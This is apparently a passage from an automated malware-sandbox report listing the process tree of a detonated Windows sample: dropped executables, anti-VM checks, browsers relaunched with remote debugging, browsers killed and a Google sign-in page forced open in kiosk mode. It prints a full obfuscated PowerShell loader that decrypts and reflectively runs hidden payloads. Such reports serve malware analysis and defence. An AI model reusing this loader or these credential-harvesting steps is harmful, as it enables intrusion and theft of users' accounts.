                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4868,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4712 /prefetch:8
                                  9⤵
                                    PID:5260
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5024,i,8024012003998939421,3884958872393060530,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4212 /prefetch:8
                                    9⤵
                                      PID:6032
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 956
                                  7⤵
                                  • Program crash
                                  PID:4200
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1088426041\tYliuwV.ps1"
                                6⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops startup file
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1956
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat"
                                  7⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4252
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat';$MoqZ='DeKyLvcoKyLvmprKyLveKyLvssKyLv'.Replace('KyLv', ''),'EJwaGlemJwaGeJwaGnJwaGtJwaGAtJwaG'.Replace('JwaG', ''),'CrgSdPegSdPagSdPtgSdPegSdPDecgSdPrypgSdPtorgSdP'.Replace('gSdP', ''),'EnAUSatAUSaryAUSaPAUSaoiAUSantAUSa'.Replace('AUSa', ''),'RifKyeaifKydifKyLiifKyneifKysifKy'.Replace('ifKy', ''),'CoIpkTpyIpkTTIpkToIpkT'.Replace('IpkT', ''),'LRxQFoRxQFaRxQFdRxQF'.Replace('RxQF', ''),'ChPYPIanPYPIgPYPIePYPIExPYPItenPYPIsioPYPInPYPI'.Replace('PYPI', ''),'SplhjTaihjTathjTa'.Replace('hjTa', ''),'IVERYnvoVERYkeVERY'.Replace('VERY', ''),'MaGACXinMGACXoduGACXlGACXeGACX'.Replace('GACX', ''),'GetEffVCuEffVrreEffVnEffVtPEffVroEffVceEffVsEffVsEffV'.Replace('EffV', ''),'TrgFlMagFlMnsgFlMfogFlMrmgFlMFingFlMalgFlMBgFlMlogFlMcgFlMkgFlM'.Replace('gFlM', ''),'FZnjbroZnjbmBaZnjbseZnjb64ZnjbSZnjbtZnjbrinZnjbgZnjb'.Replace('Znjb', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($MoqZ[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function OcByW($zyHkO){$MahHK=[System.Security.Cryptography.Aes]::Create();$MahHK.Mode=[System.Security.Cryptography.CipherMode]::CBC;$MahHK.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$MahHK.Key=[System.Convert]::($MoqZ[13])('AAMGkknb01QKxJVl43m9//ZRwVkG6pEiu9VVo6uyG5U=');$MahHK.IV=[System.Convert]::($MoqZ[13])('/W6oLxKJHKSzHfvUm38XsQ==');$RyLXH=$MahHK.($MoqZ[2])();$Vocox=$RyLXH.($MoqZ[12])($zyHkO,0,$zyHkO.Length);$RyLXH.Dispose();$MahHK.Dispose();$Vocox;}function dAZyU($zyHkO){$CHeOb=New-Object System.IO.MemoryStream(,$zyHkO);$PxKaw=New-Object System.IO.MemoryStream;$ikNUp=New-Object System.IO.Compression.GZipStream($CHeOb,[IO.Compression.CompressionMode]::($MoqZ[0]));$ikNUp.($MoqZ[5])($PxKaw);$ikNUp.Dispose();$CHeOb.Dispose();$PxKaw.Dispose();$PxKaw.ToArray();}$ygeKx=[System.IO.File]::($MoqZ[4])([Console]::Title);$WLLeN=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 5).Substring(2))));$PCQGF=dAZyU (OcByW ([Convert]::($MoqZ[13])([System.Linq.Enumerable]::($MoqZ[1])($ygeKx, 6).Substring(2))));[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$PCQGF).($MoqZ[3]).($MoqZ[9])($null,$null);[System.Reflection.Assembly]::($MoqZ[6])([byte[]]$WLLeN).($MoqZ[3]).($MoqZ[9])($null,$null); "
                                    8⤵
                                      PID:4180
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      8⤵
                                      • Blocklisted process makes network request
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2812
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                        9⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5784
                                • C:\Users\Admin\AppData\Local\Temp\1088428001\kdMujZh.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088428001\kdMujZh.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Drops file in Windows directory
                                  • System Location Discovery: System Language Discovery
                                  PID:2632
                                • C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:5604
                                  • C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5652
                                  • C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5660
                                  • C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5672
                                  • C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5684
                                  • C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1088430001\9aiiMOQ.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    PID:5692
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 816
                                    7⤵
                                    • Program crash
                                    PID:5752
                                • C:\Users\Admin\AppData\Local\Temp\1088432001\198cfc7201.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088432001\198cfc7201.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:5236
                                • C:\Users\Admin\AppData\Local\Temp\1088433001\ymy1CwP.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088433001\ymy1CwP.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:5496
                                • C:\Users\Admin\AppData\Local\Temp\1088434001\ymy1CwP.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088434001\ymy1CwP.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:5868
                                • C:\Users\Admin\AppData\Local\Temp\1088435001\6ccbdd7074.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088435001\6ccbdd7074.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  PID:6080
                                • C:\Users\Admin\AppData\Local\Temp\1088436001\ee1401f004.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1088436001\ee1401f004.exe"
                                  6⤵
                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                  • Downloads MZ/PE file
                                  • Checks BIOS information in registry
                                  • Executes dropped EXE
                                  • Identifies Wine through registry keys
                                  • Loads dropped DLL
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • System Location Discovery: System Language Discovery
                                  • Checks processor information in registry
                                  PID:5160
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                    7⤵
                                    • Uses browser remote debugging
                                    • Enumerates system info in registry
                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of FindShellTrayWindow
                                    PID:4224
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe7393cc40,0x7ffe7393cc4c,0x7ffe7393cc58
                                      8⤵
                                        PID:5388
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1964,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1960 /prefetch:2
                                        8⤵
                                          PID:5500
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1968,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2008 /prefetch:3
                                          8⤵
                                            PID:4044
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2240,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2460 /prefetch:8
                                            8⤵
                                              PID:4132
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3216,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3236 /prefetch:1
                                              8⤵
                                              • Uses browser remote debugging
                                              PID:4780
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3280 /prefetch:1
                                              8⤵
                                              • Uses browser remote debugging
                                              PID:3992
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4524,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4580 /prefetch:8
                                              8⤵
                                                PID:5688
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4560,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4696 /prefetch:1
                                                8⤵
                                                • Uses browser remote debugging
                                                PID:5604
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4836,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3860 /prefetch:8
                                                8⤵
                                                  PID:6056
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,18315538871906533865,9322917259890505645,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4964 /prefetch:8
                                                  8⤵
                                                    PID:5272
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                  7⤵
                                                  • Uses browser remote debugging
                                                  • Enumerates system info in registry
                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                  PID:1432
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe63ad46f8,0x7ffe63ad4708,0x7ffe63ad4718
                                                    8⤵
                                                    • Checks processor information in registry
                                                    • Enumerates system info in registry
                                                    PID:2496
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
                                                    8⤵
                                                      PID:2664
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
                                                      8⤵
                                                        PID:2872
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2992 /prefetch:8
                                                        8⤵
                                                          PID:5824
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                                          8⤵
                                                          • Uses browser remote debugging
                                                          PID:5764
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                                                          8⤵
                                                          • Uses browser remote debugging
                                                          PID:1372
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
                                                          8⤵
                                                          • Uses browser remote debugging
                                                          PID:6520
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5004 /prefetch:1
                                                          8⤵
                                                          • Uses browser remote debugging
                                                          PID:6528
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
                                                          8⤵
                                                            PID:6980
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1992 /prefetch:2
                                                            8⤵
                                                              PID:7152
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2660 /prefetch:2
                                                              8⤵
                                                                PID:6516
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2416 /prefetch:2
                                                                8⤵
                                                                  PID:6772
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,13522338043971865721,1319709775945889076,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2152 /prefetch:2
                                                                  8⤵
                                                                    PID:6936
                                                              • C:\Users\Admin\AppData\Local\Temp\1088437001\dd8dbe5ac0.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\1088437001\dd8dbe5ac0.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious use of FindShellTrayWindow
                                                                • Suspicious use of SendNotifyMessage
                                                                PID:1072
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM firefox.exe /T
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5212
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM chrome.exe /T
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2140
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM msedge.exe /T
                                                                  7⤵
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1432
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM opera.exe /T
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:5940
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /F /IM brave.exe /T
                                                                  7⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:528
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                  7⤵
                                                                    PID:5660
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                      8⤵
                                                                      • Checks processor information in registry
                                                                      • Modifies registry class
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of SendNotifyMessage
                                                                      • Suspicious use of SetWindowsHookEx
                                                                      PID:6076
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1780 -prefMapHandle 1776 -prefsLen 27446 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c1a6faa-9504-4fc9-8a18-f98d9796e8fd} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" gpu
                                                                        9⤵
                                                                          PID:4744
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2456 -prefMapHandle 2452 -prefsLen 28366 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d12bfa71-e830-4785-855f-a3e4eb45acae} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" socket
                                                                          9⤵
                                                                            PID:564
                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2816 -childID 1 -isForBrowser -prefsHandle 2740 -prefMapHandle 3232 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {31644b6b-3ceb-4e1e-92fa-6cbc0b681a78} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab
                                                                            9⤵
                                                                              PID:5244
                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3276 -childID 2 -isForBrowser -prefsHandle 3396 -prefMapHandle 3732 -prefsLen 32856 -prefMapSize 244658 -jsInitHandle 1292 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7abd617d-a0f6-4aa8-a542-947e09992368} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" tab
                                                                              9⤵
                                                                                PID:5396
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4776 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4768 -prefMapHandle 4760 -prefsLen 32856 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b85c9d04-2811-4e91-8065-a275e9f816da} 6076 "\\.\pipe\gecko-crash-server-pipe.6076" utility
                                                                                9⤵
                                                                                • Checks processor information in registry
                                                                                PID:1132
                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
